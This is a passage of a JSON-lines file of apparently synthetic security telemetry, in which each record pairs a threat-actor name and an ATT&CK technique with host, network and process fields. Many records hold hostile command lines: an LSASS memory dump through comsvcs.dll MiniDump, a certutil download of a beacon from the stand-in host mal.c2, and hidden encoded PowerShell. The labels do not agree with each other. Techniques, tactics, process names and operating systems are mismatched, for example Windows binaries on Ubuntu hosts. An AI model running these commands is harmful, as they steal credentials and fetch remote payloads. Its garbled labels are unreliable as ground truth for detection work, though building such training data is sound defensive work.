Logs","timestamp":"2025-06-08T04:20:21.000Z","user":{"name":"azuread\\lsfrvhbco9bt","sid":"S-1-5-21-567257191-605633313-9729"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Impact","Discovery"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20261109T110052000Z_0005649","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.27.222.136","name":"DB-ORACLE-9HQJK0RI8I","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5649Volt TyphoonT1484.001"},"network":{"domain":"github.com","dst_ip":"1.158.251.154","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1478 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-01-31T01:08:17.000Z","user":{"name":"CORP\\q3clafoq6lw0","sid":"S-1-5-21-784868788-853747891-5394"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Persistence","Impact","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20250207T092635000Z_0005651","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.191.27.155","name":"APP-WEB-XONILTOJXS","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5651Lapsus$T1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.160.170.132","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2672 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-05-06T10:11:28.000Z","user":{"name":"arn:aws:iam::4nsi19aoj9tp","sid":"S-1-5-21-140006814-938595161-6751"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20261218T173107000Z_0005653","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.144.92.102","name":"APP-WEB-NGXIE0TLCX","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5653Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.115.33.169","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3787 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"explorer.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-01-03T00:22:19.000Z","user":{"name":"arn:aws:iam::u1ppwdgvp91b","sid":"S-1-5-21-956175752-693059812-1479"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using fileless technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Initial Access","Reconnaissance","Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20260704T003627000Z_0005655","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.149.230.208","name":"APP-WEB-BEPMQVFHMF","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5655Lapsus$T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.50.89.240","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-11-10T15:14:40.000Z","user":{"name":"CORP\\43d7bmkwjy1v","sid":"S-1-5-21-856526128-409563271-2683"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Persistence"],"technique_id":"T1531"},"event_id":"evt_unc4841_20260309T092707000Z_0005657","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.68.98.220","name":"IAM-ROLE-W6XLC18Z41","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5657UNC4841T1531"},"network":{"domain":"github.com","dst_ip":"1.95.111.238","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-26T21:11:34.000Z","user":{"name":"CORP\\tbje023xvzmn","sid":"S-1-5-21-637861791-413711152-7443"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Initial Access","Collection"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20250327T074723000Z_0005659","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.250.195.151","name":"WIN-FIN-SRV-GD7XMEBCSI","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5659FIN7T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.139.47.78","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-26T21:23:44.000Z","user":{"name":"azuread\\lk6e5k94voja","sid":"S-1-5-21-336905027-496184644-2354"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20260214T215458000Z_0005661","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.113.132.147","name":"AZURE-VM-Y3LXDCBGCO","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5661FIN7T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.28.192.136","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3932 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-23T14:21:59.000Z","user":{"name":"arn:aws:iam::xnxd23x0b8yj","sid":"S-1-5-21-736006835-421468765-8693"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20250501T185742000Z_0005663","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.22.145.61","name":"APP-WEB-MSF7WKUH78","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5663FIN7T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.132.163.141","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-09-28T09:47:51.000Z","user":{"name":"CORP\\fpodlxec8pob","sid":"S-1-5-21-339816388-505158201-2841"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access","Privilege Escalation"],"technique_id":"T1003.001"},"event_id":"evt_unc4841_20261115T140347000Z_0005665","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.128.219.167","name":"AZURE-VM-QASAVPGGRS","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5665UNC4841T1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.19.175.75","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-09T16:12:31.000Z","user":{"name":"i-1zcja7llmxg2","sid":"S-1-5-21-281232804-298361659-8522"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion","Impact"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260513T105912000Z_0005667","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.69.73.124","name":"AZURE-VM-2V9P7GK11W","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5667Lapsus$T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.65.119.45","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1027 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-05-05T09:25:18.000Z","user":{"name":"CORP\\10t9vh1p0dud","sid":"S-1-5-21-963271743-883760159-4122"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Credential Access"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250503T082547000Z_0005669","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.87.226.176","name":"IAM-ROLE-6WNDIHSILJ","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5669Scattered SpiderT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.41.163.69","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-10-02T06:28:33.000Z","user":{"name":"azuread\\mu074tbsye7i","sid":"S-1-5-21-172198125-963710270-7592"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Collection"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20260804T001837000Z_0005671","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.70.235.253","name":"DB-ORACLE-6QNA4CI5EA","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5671Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.76.21.89","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2461 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-10-26T23:14:36.000Z","user":{"name":"svc_8cnh7rhzq0fx","sid":"S-1-5-21-682108790-285057272-6447"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Exfiltration","Discovery","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20260601T144801000Z_0005673","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.115.83.254","name":"EC2-INST-TETEFB5A8R","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5673APT29T1059.001"},"network":{"domain":"github.com","dst_ip":"1.86.103.5","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-09-26T13:14:46.000Z","user":{"name":"arn:aws:iam::dbzmkc9onrg6","sid":"S-1-5-21-826875425-613395896-7416"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Exfiltration","Command and Control"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20260730T035510000Z_0005675","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.0.92.172","name":"EC2-INST-68ECCAR3P6","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5675Scattered SpiderT1059.001"},"network":{"domain":"github.com","dst_ip":"1.165.166.249","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-09T15:50:52.000Z","user":{"name":"CORP\\2yuzh9s7nu6s","sid":"S-1-5-21-207866952-912650361-1071"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Collection","Command and Control","Execution"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260504T045945000Z_0005677","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.230.99.44","name":"APP-WEB-7DXSC8HJ8L","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5677Mustang PandaT1098.004"},"network":{"domain":"github.com","dst_ip":"1.179.40.202","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2926 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-09-14T10:27:41.000Z","user":{"name":"svc_kuy8iu1mry66","sid":"S-1-5-21-829301769-484366652-5725"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20251211T165215000Z_0005679","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.233.166.240","name":"AZURE-VM-XFHW08J5OG","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5679Mustang PandaT1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.81.163.61","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2559 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-20T13:44:08.000Z","user":{"name":"i-eql7y0dmqwaw","sid":"S-1-5-21-653103807-376466222-4741"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20250208T000543000Z_0005681","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.32.12.117","name":"EC2-INST-V0D20930YT","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5681UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.188.217.64","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-06T19:39:55.000Z","user":{"name":"arn:aws:iam::2md0o7iwnvwp","sid":"S-1-5-21-455327847-577817503-2659"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion"],"technique_id":"T1021.006"},"event_id":"evt_mustangpanda_20260513T110424000Z_0005683","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.91.24.161","name":"AZURE-VM-ENIDOMM1SM","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5683Mustang PandaT1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.90.77.7","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3413 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-10-14T16:44:15.000Z","user":{"name":"svc_raw3myi873x4","sid":"S-1-5-21-828786727-333623951-5696"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact","Persistence","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250604T205831000Z_0005685","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.9.205.4","name":"IAM-ROLE-MMJHQVW4E3","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5685Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.134.44.78","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2287 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-08-16T00:35:49.000Z","user":{"name":"arn:aws:iam::bx6z6z16mrgz","sid":"S-1-5-21-862105413-323123773-9876"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20250307T131810000Z_0005687","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.138.135.175","name":"IAM-ROLE-AYQ1UJQR4Y","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5687Lapsus$T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.4.94.10","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1008 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-10-24T01:33:49.000Z","user":{"name":"CORP\\ixcw5g5mmsni","sid":"S-1-5-21-991526842-129972081-7257"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using LOLBin technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Discovery","Privilege Escalation","Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20250823T035242000Z_0005689","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.68.34.167","name":"WIN-FIN-SRV-60DYIWO8VS","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5689APT41T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.64.142.90","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1093 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-08-01T16:42:43.000Z","user":{"name":"CORP\\hn910cbxbu21","sid":"S-1-5-21-108559049-803056941-6888"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery","Initial Access"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20261022T053005000Z_0005691","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.234.87.39","name":"AZURE-VM-8TX5EINB59","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5691Scattered SpiderT1071.001"},"network":{"domain":"github.com","dst_ip":"1.64.222.206","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-17T12:39:15.000Z","user":{"name":"i-6paxn3ltt305","sid":"S-1-5-21-241783885-876436456-2686"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Command and Control","Execution"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20260910T142316000Z_0005693","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.100.155.165","name":"DB-ORACLE-1GRI3EIIL9","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5693Scattered SpiderT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.95.197.152","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-03T16:48:24.000Z","user":{"name":"i-q1l1x2q69y89","sid":"S-1-5-21-674117240-130709534-7712"}}
